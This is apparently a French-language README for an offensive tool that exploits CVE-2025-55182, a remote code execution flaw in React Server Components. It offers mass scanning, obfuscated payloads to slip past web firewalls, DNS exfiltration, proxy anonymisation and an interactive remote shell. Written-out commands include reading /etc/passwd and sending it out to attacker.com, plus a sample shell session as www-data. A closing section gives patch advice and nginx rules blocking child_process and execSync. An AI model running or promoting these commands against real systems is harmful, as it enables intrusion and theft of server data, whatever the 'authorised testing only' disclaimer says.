
Scanner RCE avancé pour React Server Components ciblant CVE-2025-55182. Fonctionnalités : fingerprinting multi-étapes, vérification de vulnérabilité, exfiltration DNS, shell interactif, obfuscation de payload et reporting professionnel (JSON/HTML/PDF). Tests autorisés uniquement.
**Cet outil est conçu exclusivement à des fins ÉDUCATIVES et de TESTS DE SÉCURITÉ AUTORISÉS.**L'utilisation non autorisée de ce logiciel contre des cibles sans consentement écrit préalable constitue une violation des lois internationales sur la cybercriminalité, notamment le Computer Fraud and Abuse Act (CFAA), les exigences du RGPD et les conditions d'utilisation standard. L'auteur et les contributeurs déclinent toute responsabilité pour tout usage abusif, opération illégale ou dommage consécutif résultant de ce programme.Utilisez ce programme strictement à vos propres risques.
ReactRCE-Scanner est un framework d'évaluation et de vérification de sécurité de niveau entreprise, conçu spécifiquement pour CVE-2025-55182 [1], une vulnérabilité critique d'exécution de code à distance (RCE) affectant les React Server Components dans les versions 19.0.0 à 19.2.0.
Le framework comble le fossé entre la recherche théorique sur les vulnérabilités et la validation pratique de la sécurité. En intégrant l'empreinte multi-étapes, une réduction rigoureuse des faux positifs, une obfuscation avancée des payloads et une génération automatisée de rapports multi-formats, il offre aux ingénieurs en sécurité des capacités de diagnostic précises.
| Utilisation | Résultats de scan |
|---|---|
| Catégorie de fonctionnalité | Point fort de l'implémentation | Statut opérationnel |
|---|---|---|
| Empreinte intelligente | Détection multi-sources du framework et de la version avec algorithmes de scoring de confiance. | ✅ |
| Vérification multi-étapes | Pipeline de validation en 5 étapes conçu pour éliminer systématiquement les faux positifs. | ✅ |
| Génération de payloads | Générateur de payloads obfusqués prenant en charge l'exfiltration DNS et le multi-encodage. | ✅ |
| Shell interactif | Exécution de commandes pseudo-interactive en temps réel et accès shell sur les cibles vérifiées. | ✅ |
| Rapports complets | Génération automatisée de rapports aux formats JSON, HTML, PDF et Markdown. | ✅ |
| Exfiltration DNS | Exfiltration hors bande de la sortie des commandes via une gestion sécurisée des requêtes DNS. | ✅ |
| Moteur de concurrence | Architecture de scan multi-thread haute performance pour les grandes surfaces d'attaque. | ✅ |
| Intégration de proxy | Prise en charge des proxys HTTP/HTTPS et SOCKS pour un trafic d'évaluation anonymisé. | ✅ |
Clonez le dépôt et initialisez l'environnement à l'aide du script de configuration automatisé ou d'une installation manuelle des dépendances :
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh
# Alternatively, install core Python dependencies manually
pip install -r requirements.txt
Le framework fonctionne via une architecture CLI modulaire prenant en charge la validation d'une cible unique, le scan en masse à partir de listes de fichiers, le lancement de shells interactifs et la génération de rapports de conformité.
# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan
# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json
# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"
# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell
# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com
# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf
Le framework effectue une reconnaissance approfondie avant la livraison du payload. Il analyse plusieurs champs d'en-tête HTTP (X-Powered-By, Next-Action, RSC ), les balises méta structurelles HTML (data-reactroot, __NEXT_DATA__), les ressources de build statiques et les bundles source JavaScript [2] [3].
Les scores de confiance sont classés en quatre niveaux :
CRITIQUE (95 %+) : Plusieurs indicateurs orthogonaux confirment des versions vulnérables du runtime React Server Component.
ÉLEVÉ (75–95 %) : Indicateurs structurels forts identifiés avec correspondance exacte de version.
MOYEN (50–75 %) : Marqueurs partiels du framework présents ; vérification manuelle requise.
FAIBLE (<50 %) : Heuristiques faibles détectées ; probabilité élevée de faux positif.
Afin de maintenir l'intégrité opérationnelle et de prévenir toute perturbation involontaire des services, les payloads passent par un pipeline de validation strict avant que toute phase d'exploitation ne soit débloquée.
Target URL / Endpoint
│
▼
[Stage 1] Framework & Header Detection
│
▼
[Stage 2] Component Version Analysis
│
▼
[Stage 3] Protocol Compatibility Check
│
▼
[Stage 4] Non-Destructive Safe Validation Request
│
▼
[Stage 5] Statistical Confidence Scoring
│
▼
Vulnerability Assessment Decision
Pour tester les contrôles défensifs et les pare-feu applicatifs web (WAF), le framework intègre un générateur de payloads avancé prenant en charge :
Schémas d'encodage : transformations Base64, hexadécimales et octales.
Obfuscation structurelle : découpage dynamique de chaînes, injection de code inutile et mappage de méthodes require alternatives.
Exfiltration hors bande (OOB) : tunnelisation sécurisée des données via des requêtes DNS lorsque les canaux de réponse directs sont restreints.
Une fois la session établie avec succès, les opérateurs peuvent invoquer un environnement shell interactif pour l'énumération post-vérification.
$ python exploit.py -t https://target.com -m shell
[*] Initializing interactive shell session against https://target.com
[!] Type 'exit' to terminate the session.
shell> whoami
www-data
shell> uname -a
Linux ip-10-0-1-15 6.8.0-1018-aws #20-Ubuntu SMP PREMO__X64 x86_64 GNU/Linux
shell> exit
[*] Terminating session and cleaning up temporary artifacts...
Les rapports peuvent être générés dans plusieurs formats standardisés (JSON, HTML, PDF, Markdown ) contenant des résumés exécutifs, des métriques de risque, des constatations techniques détaillées, des chronologies de preuves et des décompositions du score CVSS v3.1 [4].
Les paramètres avancés sont gérés via le fichier de configuration config.yaml. Voici un modèle de configuration de production :
# ReactRCE-Scanner Production Configuration
timeout: 30
threads: 20
max_retries: 3
proxy: null
user_agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
headers:
Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
Accept-Language: "en-US,en;q=0.5"
Accept-Encoding: "gzip, deflate, br"
output:
format: "json"
directory: "./reports"
logging:
level: "INFO"
file: "exploit.log"
exploit:
obfuscate: true
encoding: "base64"
timeout: 60
scanning:
concurrent_scans: 20
rate_limit: 0.5
timeout: 30
fingerprint:
enable_deep_analysis: true
follow_redirects: true
analyze_assets: true
Exécutez les scans en référençant le fichier de configuration personnalisé via :
python exploit.py -f targets.txt -C config.yaml -o report.json
Le dépôt inclut une suite complète de tests unitaires et d'intégration pour garantir la stabilité des modules entre les versions.
# Execute the complete automated test suite
python exploit.py --test
# Expected Output:
Running test suite...
✓ test_fingerprinting passed
✓ test_payload_generation passed
✓ test_config_loading passed
✓ test_verification passed
✓ test_report_generation passed
Tests passed: 5/5
Pour les contributeurs mettant en place un environnement de développement local :
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
pip install -r requirements-dev.txt
# Run pytest unit tests
pytest tests/
# Format and lint codebase
black exploit.py
flake8 exploit.py
Correctifs : Mettez immédiatement à niveau les paquets React vers la version 19.2.1 ou supérieure. Mettez à jour les instances Next.js vers la version 15.0.4+ [5].
Surveillance : Inspectez les journaux d'accès HTTP à la recherche de valeurs d'en-tête Next-Action suspectes et de références de prototype non validées (__proto__, constructor ) [6].
Durcissement réseau : Restreignez les requêtes DNS récursives sortantes depuis les serveurs applicatifs afin de prévenir l'exfiltration de données.
# Block prototype pollution and remote execution attempts in request bodies
if ($request_body ~* "__proto__") {
return 403;
}
if ($request_body ~* "constructor") {
return 403;
}
if ($request_body ~* "child_process") {
return 403;
}
if ($request_body ~* "execSync") {
return 403;
}
Les contributions, demandes de fonctionnalités et rapports de bugs sont les bienvenus. Veuillez respecter le workflow standard fork-and-pull request :
Forkez le dépôt (https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit/fork )
Créez votre branche de fonctionnalité (git checkout -b feature/AdvancedScannerModule)
Committez vos modifications (git commit -m 'Add advanced scanning heuristic')
Poussez vers la branche (git origin push feature/AdvancedScannerModule)
Ouvrez une Pull Request
Distribué sous licence MIT. Voir LICENSE pour plus d'informations.
Créé avec précision par CerberusMrXi Dernière mise à jour : août 2026